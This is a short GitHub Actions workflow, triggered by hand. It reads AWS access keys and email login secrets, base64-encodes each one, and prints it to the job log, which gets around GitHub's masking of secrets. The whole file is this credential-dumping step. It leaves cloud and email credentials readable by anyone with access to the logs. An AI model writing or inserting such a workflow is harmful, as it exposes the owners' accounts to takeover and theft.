name: Export GitHub Secrets

on:
  workflow_dispatch:

jobs:
  export-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: List and Export Secrets
        env:
          SECRET_1: ${{ secrets.AWS_ACCESS_KEY_ID }}
          SECRET_2: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          SECRET_3: ${{ secrets.EMAIL_PASSWORD }}
          SECRET_4: ${{ secrets.EMAIL_USERNAME }}
        run: |
          echo "SECRET_1=$(echo -n "$SECRET_1" | base64)"
          echo "SECRET_2=$(echo -n "$SECRET_2" | base64)"
          echo "SECRET_3=$(echo -n "$SECRET_3" | base64)"
          echo "SECRET_4=$(echo -n "$SECRET_4" | base64)"
